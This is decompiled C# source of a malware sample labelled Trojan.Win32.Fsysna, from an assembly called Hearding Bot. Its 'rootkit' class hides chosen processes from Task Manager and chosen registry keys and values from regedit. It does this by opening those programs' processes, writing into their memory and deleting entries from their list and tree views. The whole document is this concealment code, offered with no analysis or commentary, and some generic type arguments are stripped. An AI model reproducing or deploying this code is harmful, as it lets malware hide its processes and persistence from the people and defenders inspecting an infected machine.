// Decompiled with JetBrains decompiler // Type: Hearding_Bot.rootkit // Assembly: Hearding Bot, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null // MVID: 931E7B23-EA6E-4139-8BD0-1A4E0BF9E258 // Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Trojan.Win32.Fsysna.dljm-a7abcca3397d1344b43d53c1427609ca1808f1991c5d2b158fd67c1ea3e6f19a.exe using Microsoft.Win32; using System; using System.Collections.Generic; using System.Diagnostics; using System.Management; using System.Runtime.InteropServices; using System.Threading; namespace Hearding_Bot { internal class rootkit { public static bool Initialized1; public static bool Initialized2; public static bool Initialized3; public static DateTime TaskManagerTime = DateTime.Now; public static int TaskManagerCount; public static bool TaskManagerReload; public static List RegistryKeys = new List(); public static void Initialize(int proc) { switch (proc) { case 1: new Thread((ThreadStart) (() => { while (true) { rootkit._HideProcess(); Thread.Sleep(500); } })).Start(); rootkit.Initialized1 = true; break; case 2: new Thread((ThreadStart) (() => { while (true) Thread.Sleep(rootkit._HideRegistryValue() ? 10 : 250); })).Start(); rootkit.Initialized2 = true; break; case 3: new Thread((ThreadStart) (() => { while (true) Thread.Sleep(rootkit._HideRegistryKey() ? 10 : 250); })).Start(); rootkit.Initialized3 = true; break; } } public static void _HideProcess() { try { IntPtr mainWindowHandle = Process.GetProcessesByName("taskmgr")[0].MainWindowHandle; rootkit.Api.WindowPlacement lpwndpl = new rootkit.Api.WindowPlacement(); lpwndpl.length = Marshal.SizeOf((object) lpwndpl); rootkit.Api.GetWindowPlacement(mainWindowHandle, ref lpwndpl); bool flag1 = lpwndpl.showCmd == 1 || lpwndpl.showCmd == 3; IntPtr dlgItem = rootkit.Api.GetDlgItem(rootkit.Api.FindWindowEx(mainWindowHandle, IntPtr.Zero, (string) null, (string) null), 1009); IntPtr menu = rootkit.Api.GetMenu(mainWindowHandle); IntPtr subMenu1 = rootkit.Api.GetSubMenu(menu, 2); IntPtr subMenu2 = rootkit.Api.GetSubMenu(subMenu1, 1); uint menuItemId = rootkit.Api.GetMenuItemID(subMenu1, 0); if (subMenu2 != IntPtr.Zero) { rootkit.Api.SendMessage(mainWindowHandle, 273U, (IntPtr) (long) rootkit.Api.GetMenuItemID(subMenu2, 3), IntPtr.Zero); rootkit.Api.RemoveMenu(subMenu1, (uint) (int) subMenu2, 1U); } rootkit.Api.EnableMenuItem(menu, menuItemId, 1U); if (flag1) rootkit.Api.LockWindowUpdate(dlgItem); if ((DateTime.Now - rootkit.TaskManagerTime).TotalMilliseconds > 1000.0) { rootkit.Api.SendMessage(mainWindowHandle, 273U, (IntPtr) (long) menuItemId, IntPtr.Zero); rootkit.TaskManagerTime = DateTime.Now; } GC.Collect(); int num = (int) rootkit.Api.SendMessage(dlgItem, 4100U, IntPtr.Zero, ""); if (num != rootkit.TaskManagerCount || rootkit.TaskManagerReload) { rootkit.TaskManagerReload = false; rootkit.TaskManagerCount = num; for (int index1 = 0; index1 < num; ++index1) { string[] strArray = new string[10]; for (int subitem = 0; subitem < 10; ++subitem) { strArray[subitem] = rootkit.GetListViewItem(dlgItem, index1, subitem).ToLower(); if (subitem > 0 && strArray[subitem] == strArray[0]) break; } foreach (rootkit.Proc proc in rootkit.Proc.List) { bool flag2 = false; bool flag3 = false; for (int index2 = 0; index2 < 10 && strArray[index2] != null && (!flag2 || !flag3); ++index2) { if (strArray[index2].StartsWith(proc.Name)) flag2 = true; else if (strArray[index2] == proc.User) flag3 = true; } if (flag2 && flag3) { rootkit.Api.SendMessage(dlgItem, 4104U, (IntPtr) index1--, IntPtr.Zero); --rootkit.TaskManagerCount; break; } } } } if (!flag1) return; rootkit.Api.LockWindowUpdate(IntPtr.Zero); } catch { } } public static bool _HideRegistryValue() { bool flag = false; try { IntPtr mainWindowHandle = Process.GetProcessesByName("regedit")[0].MainWindowHandle; flag = true; rootkit.Api.FindWindowEx(mainWindowHandle, IntPtr.Zero, (string) null, (string) null); IntPtr dlgItem = rootkit.Api.GetDlgItem(mainWindowHandle, 2); string statusBarText = rootkit.GetStatusBarText(rootkit.Api.GetDlgItem(mainWindowHandle, 3), 0); string lower = statusBarText.Substring(statusBarText.IndexOf("\\") + 1).ToLower(); int num1 = 0; RegistryKey registryKey = (RegistryKey) null; foreach (rootkit.RegVal regVal in rootkit.RegVal.List) { if (regVal.Key == lower) { registryKey = regVal.RegKey; ++num1; } } if (num1 > 0) { int num2 = (int) rootkit.Api.SendMessage(dlgItem, 4100U, IntPtr.Zero, IntPtr.Zero); if (num2 != registryKey.ValueCount + 1 - num1) { rootkit.Api.LockWindowUpdate(dlgItem); for (int index = 1; index < num2; ++index) { foreach (rootkit.RegVal regVal in rootkit.RegVal.List) { if (regVal.Key == lower && regVal.Value == rootkit.GetListViewItem(dlgItem, index, 0).ToLower()) rootkit.Api.SendMessage(dlgItem, 4104U, (IntPtr) index--, IntPtr.Zero); } } rootkit.Api.LockWindowUpdate(IntPtr.Zero); } } } catch { } return flag; } public static bool _HideRegistryKey() { bool flag = false; try { IntPtr mainWindowHandle = Process.GetProcessesByName("regedit")[0].MainWindowHandle; flag = true; rootkit.Api.FindWindowEx(mainWindowHandle, IntPtr.Zero, (string) null, (string) null); IntPtr dlgItem = rootkit.Api.GetDlgItem(mainWindowHandle, 1); int index = rootkit.Api.SendMessage(dlgItem, 4362, 4U, (IntPtr) rootkit.Api.SendMessage(dlgItem, 4362, 0U, IntPtr.Zero)); IntPtr num1 = Marshal.AllocHGlobal(1024); int lpwdProcessID; rootkit.Api.GetWindowThreadProcessId(dlgItem, out lpwdProcessID); IntPtr num2 = rootkit.Api.OpenProcess(2035711U, false, lpwdProcessID); IntPtr num3 = rootkit.Api.VirtualAllocEx(num2, IntPtr.Zero, 1024U, 4096U, 4U); rootkit.ExtractRegKey(num2, dlgItem, index, num1, num3, new List()); Marshal.FreeHGlobal(num1); rootkit.Api.VirtualFreeEx(num2, num3, 0, 32768U); rootkit.Api.CloseHandle(num2); GC.Collect(); } catch { } return flag; } public static void HideProcess(Process process) { if (!rootkit.Initialized1) rootkit.Initialize(1); rootkit.Proc proc = new rootkit.Proc(process); rootkit.TaskManagerReload = true; } public static void HideRegistryValue(RegistryKey key, string value) { if (!rootkit.Initialized2) rootkit.Initialize(2); rootkit.RegVal regVal = new rootkit.RegVal(key, value); } public static void HideRegistryKey(RegistryKey key) { if (!rootkit.Initialized3) rootkit.Initialize(3); rootkit.RegistryKeys.Add(key.Name.ToLower().Split('\\')); } public static void ExtractRegKey( IntPtr hProcess, IntPtr hTreeview, int index, IntPtr lpLocalBuffer, IntPtr lpRemoteBuffer, List stack) { for (; index > 0; index = rootkit.Api.SendMessage(hTreeview, 4362, 1U, (IntPtr) index)) { rootkit.Api.WriteProcessMemory(hProcess, lpRemoteBuffer, ref new rootkit.Api.TvItem() { mask = 1, hItem = (IntPtr) index, pszText = (IntPtr) ((int) lpRemoteBuffer + Marshal.SizeOf(typeof (rootkit.Api.TvItem))), cchTextMax = (int) byte.MaxValue }, Marshal.SizeOf(typeof (rootkit.Api.TvItem)), IntPtr.Zero); rootkit.Api.SendMessage(hTreeview, 4364, 0U, lpRemoteBuffer); rootkit.Api.ReadProcessMemory(hProcess, lpRemoteBuffer, lpLocalBuffer, 1024, IntPtr.Zero); string lower = Marshal.PtrToStringAnsi((IntPtr) ((int) lpLocalBuffer + Marshal.SizeOf(typeof (rootkit.Api.TvItem)))).ToLower(); if (index > 0) { int index1 = rootkit.Api.SendMessage(hTreeview, 4362, 4U, (IntPtr) index); stack.Add(lower); bool flag1 = false; foreach (string[] registryKey in rootkit.RegistryKeys) { if (stack.Count == registryKey.Length) { bool flag2 = true; for (int index2 = 0; index2 < stack.Count; ++index2) { if (stack[index2] != registryKey[index2]) { flag2 = false; break; } } if (flag2) { flag1 = true; break; } } } stack.RemoveAt(stack.Count - 1); if (flag1) rootkit.Api.SendMessage(hTreeview, 4353, 4U, (IntPtr) index); else if (index1 > 0) { stack.Add(lower); rootkit.ExtractRegKey(hProcess, hTreeview, index1, lpLocalBuffer, lpRemoteBuffer, new List((IEnumerable) stack.ToArray())); stack.RemoveAt(stack.Count - 1); } } } } public static string GetStatusBarText(IntPtr handle, int index) { int dwSize = ((int) rootkit.Api.SendMessage(handle, 1036U, (IntPtr) index, IntPtr.Zero) & (int) ushort.MaxValue) * 2; uint lpdwProcessId = 0; int windowThreadProcessId = (int) rootkit.Api.GetWindowThreadProcessId(handle, out lpdwProcessId); IntPtr num1 = rootkit.Api.OpenProcess(2033663U, false, (int) lpdwProcessId); IntPtr num2 = rootkit.Api.VirtualAllocEx(num1, IntPtr.Zero, (uint) dwSize, 12288U, 4U); int numberOfBytesRead = 0; byte[] buffer = new byte[dwSize]; rootkit.Api.SendMessage(handle, 1037U, (IntPtr) index, num2); rootkit.Api.ReadProcessMemory(num1, num2, buffer, dwSize, out numberOfBytesRead); string statusBarText = ""; for (int index1 = 0; index1 < buffer.Length; index1 += 2) statusBarText += (string) (object) Convert.ToChar((int) buffer[index1] | (int) buffer[index1 + 1] << 8); rootkit.Api.CloseHandle(num1); return statusBarText; } public static string GetListViewItem(IntPtr hWnd, int index, int subitem) { rootkit.Api.LvItem buffer = new rootkit.Api.LvItem(); IntPtr num1 = Marshal.AllocHGlobal(1024); uint lpdwProcessId; int windowThreadProcessId = (int) rootkit.Api.GetWindowThreadProcessId(hWnd, out lpdwProcessId); IntPtr num2 = rootkit.Api.OpenProcess(2035711U, false, (int) lpdwProcessId); IntPtr num3 = rootkit.Api.VirtualAllocEx(num2, IntPtr.Zero, 1024U, 4096U, 4U); buffer.mask = 1U; buffer.iItem = index; buffer.iSubItem = subitem; buffer.pszText = (IntPtr) ((int) num3 + Marshal.SizeOf(typeof (rootkit.Api.LvItem))); buffer.cchTextMax = 50; rootkit.Api.WriteProcessMemory(num2, num3, ref buffer, Marshal.SizeOf(typeof (rootkit.Api.LvItem)), 0); rootkit.Api.SendMessage(hWnd, 4101U, IntPtr.Zero, num3); rootkit.Api.ReadProcessMemory(num2, num3, num1, 1024, 0); string stringAnsi = Marshal.PtrToStringAnsi((IntPtr) ((int) num1 + Marshal.SizeOf(typeof (rootkit.Api.LvItem)))); Marshal.FreeHGlobal(num1); rootkit.Api.VirtualFreeEx(num2, num3, 0, 32768U); rootkit.Api.CloseHandle(num2); return stringAnsi; } public static string GetProcessUser(Process process) { foreach (ManagementObject managementObject in new ManagementObjectSearcher("Select * From Win32_Process Where ProcessID = " + (object) process.Id).Get()) { string[] args = new string[1]{ "" }; if (Convert.ToInt32(managementObject.InvokeMethod("GetOwner", (object[]) args)) == 0) return args[0]; } return ""; } public class Proc { public static List List = new List(); public string Name; public string User; public Proc(Process proc) { this.Name = proc.ProcessName.ToLower(); this.User = rootkit.GetProcessUser(proc).ToLower(); lock (rootkit.Proc.List) rootkit.Proc.List.Add(this); } } public class RegVal { public static List List = new List(); public RegistryKey RegKey; public string Key; public string Value; public RegVal(RegistryKey key, string value) { this.RegKey = key; this.Key = key.Name.ToLower(); this.Value = value.ToLower(); lock (rootkit.RegVal.List) rootkit.RegVal.List.Add(this); } } internal static class Api { [DllImport("user32.dll", SetLastError = true)] public static extern IntPtr FindWindowEx( IntPtr hwndParent, IntPtr hwndChildAfter, string lpszClass, string lpszWindow); [DllImport("user32.dll")] public static extern IntPtr GetDlgItem(IntPtr hDlg, int nIDDlgItem); [DllImport("user32.dll")] public static extern bool EnableWindow(IntPtr hWnd, bool bEnable); [DllImport("user32.dll")] public static extern IntPtr GetMenu(IntPtr hWnd); [DllImport("user32.dll", CharSet = CharSet.Ansi, SetLastError = true)] public static extern IntPtr GetSubMenu(IntPtr hMenu, int nPos); [DllImport("user32.dll")] public static extern uint GetMenuItemID(IntPtr hMenu, int nPos); [DllImport("user32.dll")] public static extern bool EnableMenuItem(IntPtr hMenu, uint uIDEnableItem, uint uEnable); [DllImport("user32.dll")] public static extern bool RemoveMenu(IntPtr hMenu, uint uPosition, uint uFlags); [DllImport("user32.dll", CharSet = CharSet.Auto)] public static extern IntPtr SendMessage( IntPtr hWnd, uint Msg, IntPtr wParam, IntPtr lParam); [DllImport("user32.dll", CharSet = CharSet.Auto)] public static extern IntPtr SendMessage( IntPtr hWnd, uint Msg, IntPtr wParam, string lParam); [DllImport("user32.dll", CharSet = CharSet.Auto)] public static extern IntPtr SendMessage( IntPtr hWnd, [MarshalAs(UnmanagedType.U4)] int msg, IntPtr wParam, ref rootkit.Api.TvItem item); [DllImport("user32.dll")] public static extern int SendMessage(IntPtr hWnd, int Msg, uint wParam, IntPtr lParam); [DllImport("user32.dll")] public static extern bool LockWindowUpdate(IntPtr hWndLock); [DllImport("user32.dll")] public static extern bool ShowWindowAsync(IntPtr hWnd, int nCmdShow); [DllImport("user32.dll")] [return: MarshalAs(UnmanagedType.Bool)] public static extern bool GetWindowPlacement( IntPtr hWnd, ref rootkit.Api.WindowPlacement lpwndpl); [DllImport("kernel32.dll")] public static extern IntPtr OpenProcess( uint dwDesiredAccess, [MarshalAs(UnmanagedType.Bool)] bool bInheritHandle, int dwProcessId); [DllImport("kernel32.dll")] public static extern bool CloseHandle(IntPtr hObject); [DllImport("kernel32.dll", SetLastError = true)] public static extern IntPtr VirtualAllocEx( IntPtr hProcess, IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect); [DllImport("kernel32.dll", SetLastError = true)] public static extern bool VirtualFreeEx( IntPtr hProcess, IntPtr lpAddress, int dwSize, uint dwFreeType); [DllImport("kernel32.dll")] public static extern bool ReadProcessMemory( IntPtr hProcess, IntPtr baseAddress, byte[] buffer, int dwSize, out int numberOfBytesRead); [DllImport("kernel32.dll")] public static extern bool ReadProcessMemory( IntPtr hProcess, IntPtr lpBaseAddress, IntPtr lpBuffer, int dwSize, int lpNumberOfBytesRead); [DllImport("kernel32.dll")] public static extern bool WriteProcessMemory( IntPtr hProcess, IntPtr lpBaseAddress, ref rootkit.Api.TvItem buffer, int dwSize, IntPtr lpNumberOfBytesWritten); [DllImport("kernel32.dll", SetLastError = true)] public static extern bool WriteProcessMemory( IntPtr hProcess, IntPtr lpBaseAddress, byte[] lpBuffer, uint nSize, out int lpNumberOfBytesWritten); [DllImport("kernel32.dll")] public static extern bool WriteProcessMemory( IntPtr hProcess, IntPtr lpBaseAddress, ref rootkit.Api.LvItem buffer, int dwSize, int lpNumberOfBytesWritten); [DllImport("kernel32.dll")] public static extern bool ReadProcessMemory( IntPtr hProcess, IntPtr lpBaseAddress, IntPtr lpBuffer, int dwSize, IntPtr lpNumberOfBytesRead); [DllImport("user32.dll", SetLastError = true)] public static extern uint GetWindowThreadProcessId(IntPtr hWnd, out uint lpdwProcessId); [DllImport("user32.dll")] public static extern IntPtr GetWindowThreadProcessId(IntPtr hWnd, out int lpwdProcessID); public struct LvItem { public uint mask; public int iItem; public int iSubItem; public uint state; public uint stateMask; public IntPtr pszText; public int cchTextMax; public int iImage; } public struct TvItem { public int mask; public IntPtr hItem; public int state; public int stateMask; public IntPtr pszText; public int cchTextMax; public int iImage; public int iSelectedImage; public int cChildren; public IntPtr lParam; public int iIntegral; } public struct Rect { private int left; private int top; private int right; private int bottom; } public struct Point { private int x; private int y; } public struct WindowPlacement { public int length; public int flags; public int showCmd; public rootkit.Api.Point ptMinPosition; public rootkit.Api.Point ptMaxPosition; public rootkit.Api.Rect rcNormalPosition; } } } }